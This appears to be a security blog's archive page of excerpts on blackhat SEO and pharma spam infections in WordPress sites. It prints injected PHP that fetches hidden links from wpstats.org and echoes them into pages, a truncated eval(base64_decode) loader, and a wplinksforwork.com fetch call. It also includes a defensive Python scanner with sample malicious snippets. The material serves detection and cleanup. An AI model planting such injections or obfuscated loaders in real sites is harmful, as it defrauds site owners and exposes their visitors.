SiteCheck – Got Blackhat SEO Spam Warning?

As of late it seems like we've been talking about a lot of SPAM-related cases; this post will be no different.

Blackhat SEO

Before you start, let me preface this by saying that clearing a Blackhat SEO Spam injection is probably the biggest PITA (Google it) infection there is. These injections constantly evolve, which makes them difficult to detect, and they employ both new and old techniques that, even after years, still prove to be annoying. This post will demonstrate one such case.


Pharma Hack Backdoor Analyzed – PHP5.PHP

Some of you might remember my last Pharma hack post, Intelligent (Pharma) SPAM Decoded. Today I will spend some time looking at a different variant of the same infection type, but focus on a payload that is not encoded or embedded within an existing file; instead it resides in its own file, PHP5.php.

“Hmm, maybe it’s a good / system file, it does have PHP in it, I won’t bother looking at it…”

If you have ever come across this file and found yourself thinking this, we highly encourage you not to, and to take a minute to see if any of its components resemble what we're about to share.

Dissecting the Payload

Wpstats.org Spam and a Fake Advanced Search Plugin

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if (function_exists('curl_init')) {
    // fetch a "jquery" file that actually contains the hidden spam links
    $url = "http://www.wpstats.org/jquery-1.6.3.min.js";
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    // write whatever the remote server returned straight into the page
    echo "$data";
}

If you are not familiar with PHP, this code contacts www.wpstats.org/jquery-1.6.3.min.js, which returns a long list of hidden links to be included on your site (not visible in a normal browser).


Website Cross-contamination: Blackhat SEO Spam Malware

We recently posted about Website Cross-Contamination which we see quite a bit of in shared hosting environments. This post is a follow up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push their campaign.

We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:


Intelligent (Pharma) Spam Decoded

We are seeing a rise in the use of intelligent SPAM, a.k.a. the Pharma Hack, across a number of platforms. We recently found a nice injection that made us salivate, and we figured you'd be just as interested.

It is no surprise to us that attackers are always looking for ways to trick us and, more importantly, our users. This gem of a find was no different.

SPAM = “Stupid, Pointless Annoying Message”.

SPAM, in the form of unsolicited e-mail messages, is a problem that we face every day. Imagine sending a client a link to a newly released product; they get to the page, and BAM, they're greeted with advertisements for pharmaceutical products (Viagra / Cialis / Male Enhancers). What do you think the impact would be?

DreamHost Security Issue Prompts FTP Password Resets

Yesterday on the DreamHost Status Blog, it was announced that all shell/FTP passwords would be reset due to what looks to be a security breach that was discovered on one of the DreamHost database servers.

DreamHost looks to have done a great job notifying affected customers via the update page, keeping them up to date throughout the day until the issue was resolved. It looks like all FTP passwords were indeed reset.

We recommend that all DreamHost customers log in to their accounts and check their account status. We encourage you to change your account passwords, and it wouldn't hurt to change your FTP and database passwords again just to be sure.


Funny Spammers: Any Reproduction of This Document in Part or in Whole is Strictly Prohibited

Spam is nothing new, but a recent site we were reviewing was a bit different. After a bit of analysis, we found a file called tracks.php that was generating spam with the following code on it:

<?php // Any reproduction of this document in part or in whole is strictly prohibited. For educational purposes only. 1993-2011 (c)
error_reporting(0) ;eval ( base64_decode("JGxMOXdGMWFZNHpYNmpUMWdUNmdRN2xPMG..

Mass Spam Infection From Wplinksforwork Dot Com (50k+ WordPress Sites Hacked)

Last year we spoke about the siteurlpath blackhat SEO attack that was infecting many WordPress sites with spam.

But, how many? We had no clue at the time. Today, we decided to check on Google and it seems that almost 50k (yes, fifty thousand sites) were compromised, at minimum…

How do we know this? Well, the attack consists of contacting the domain wplinksforwork.com to get a list of links to be displayed on the compromised sites. However, that domain has been down for the last few days, and all the compromised sites (if they have display errors enabled) show this message in their footer:

Warning: file_get_contents(http://wplinksforwork.com/56132.. 47509328/p.php?host=… failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in ..
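
Both the wpstats.org snippet above and the wplinksforwork.com footer warning come from the same pattern: theme code fetches a URL on a third-party host and echoes the response into the page. The scanner below is an added example for defenders, not Sucuri's own tooling; it walks a theme or plugin directory and flags PHP code where a quoted external URL is handed to a fetch function (curl via CURLOPT_URL, file_get_contents, fopen, wp_remote_get) with an echo or print nearby. The allow-list of hosts, the window size and the three sample snippets are constructed assumptions; the wplinksforwork path in the sample is a placeholder, since the page only shows it truncated.

```python
"""Flag PHP code that fetches a remote URL and echoes the response into the page.

Added example (not Sucuri's code): a defender-side scanner for the pattern seen in
the wpstats.org and wplinksforwork.com injections. ALLOWED_HOSTS, WINDOW and the
SAMPLE_* snippets are constructed assumptions for illustration.
"""
from __future__ import annotations

import re
import sys
from pathlib import Path

# Hosts the site's own code is expected to call (assumed; tune per site).
ALLOWED_HOSTS = {"api.wordpress.org", "downloads.wordpress.org"}

# A quoted http(s) URL literal: group 1 is the whole URL, group 2 its host.
URL_RE = re.compile(r"""['"](https?://([^/'"\s:]+)[^'"]*)['"]""", re.I)
# Functions that pull a remote body into PHP (curl_init starts a curl fetch).
FETCH_NAMES = r"\b(?:file_get_contents|fopen|wp_remote_get|curl_init)"
# Anything that writes a string into the served page.
OUTPUT_RE = re.compile(r"\b(?:echo|print)\b", re.I)
# Lines inspected on either side of the URL literal; injections are compact.
WINDOW = 5


def _url_is_fetched(url: str, window: str) -> bool:
    """True if `url` reaches a fetch call, directly or through a variable."""
    q = re.escape(url)
    # Direct form: file_get_contents("http://...")
    if re.search(FETCH_NAMES + r"\s*\(\s*['\"]" + q, window, re.I):
        return True
    # Indirect form: $url = "http://..."; ... CURLOPT_URL, $url  (or fetch($url))
    assign = re.search(r"\$(\w+)\s*=\s*['\"]" + q, window)
    if not assign:
        return False
    var = r"\$" + re.escape(assign.group(1)) + r"\b"
    return bool(
        re.search(FETCH_NAMES + r"\s*\(\s*" + var, window, re.I)
        or re.search(r"CURLOPT_URL\s*,\s*" + var, window, re.I)
    )


def find_remote_fetches(code: str, path: str = "<string>") -> list[dict]:
    """Return one finding per external URL that is fetched and then echoed."""
    findings = []
    lines = code.splitlines()
    for idx, line in enumerate(lines, start=1):
        for url, host in URL_RE.findall(line):
            host = host.lower()
            if host in ALLOWED_HOSTS:
                continue
            window = "\n".join(lines[max(0, idx - 1 - WINDOW): idx + WINDOW])
            if _url_is_fetched(url, window) and OUTPUT_RE.search(window):
                findings.append({"path": path, "line": idx, "host": host, "url": url})
    return findings


def scan_directory(root: Path) -> list[dict]:
    """Scan every *.php file under `root` (a theme or plugin directory)."""
    results = []
    for php in sorted(root.rglob("*.php")):
        results.extend(find_remote_fetches(php.read_text(errors="replace"), str(php)))
    return results


# Constructed samples: the first two mimic the injections described on this page.
SAMPLE_WPSTATS = """<?php
if(function_exists('curl_init')) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }
"""
SAMPLE_WPLINKS = """<?php
$links = file_get_contents("http://wplinksforwork.com/PLACEHOLDER_PATH/p.php?host=" . $_SERVER['HTTP_HOST']);
echo $links;
"""
SAMPLE_BENIGN = """<?php
echo '<a href="http://example.com/about">About</a>';
$css = file_get_contents(get_template_directory() . '/style.css');
"""

if __name__ == "__main__":
    root = Path(sys.argv[1] if len(sys.argv) > 1 else ".")
    for f in scan_directory(root):
        print(f"{f['path']}:{f['line']}: fetches {f['host']} and echoes it ({f['url']})")
```

Run it as `python scan_theme.py /path/to/wp-content/themes` and review each hit by hand: a legitimate theme rarely needs to pull a remote body and print it verbatim, so the allow-list should stay short. The benign sample shows the main false-positive trap the check avoids: a URL that only appears inside an anchor tag is not flagged even when a local file_get_contents sits on the next line.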

Mass Compromise of Sites at gogvo.com – SEO Spam

A regular topic of discussion the past few months has been the basicpills link injection (a type of blackhat seo spam) on WordPress sites.

If you are not familiar with it, thousands of sites have been infected with basicpills, which injects a ton of spammy pharma links all over the compromised site (it infiltrates WordPress and attacks the wp_posts table).

So what does that have to do with gogvo.com getting compromised? Well, in the past, the attackers would inject links directing to 247pharmaceutical.com or amoxilpharm.com, or sometimes to something else similar. They seem to have changed tactics; now they are injecting links to an image directory, like:


Host4africa Mass Compromise

We are seeing a lot of sites hosted at host4africa.com compromised with Blackhat SEO Spam. Most of them are in the .co.za TLD (at 74.53.0.0/16 and 74.54.0.0/16) and have hidden links to generic drugs (common Pharma Spam).

When you click on links added to the compromised sites you are redirected to a Pharma page, like this one:

The number of sites compromised is pretty large. Here are some we identified on one site:
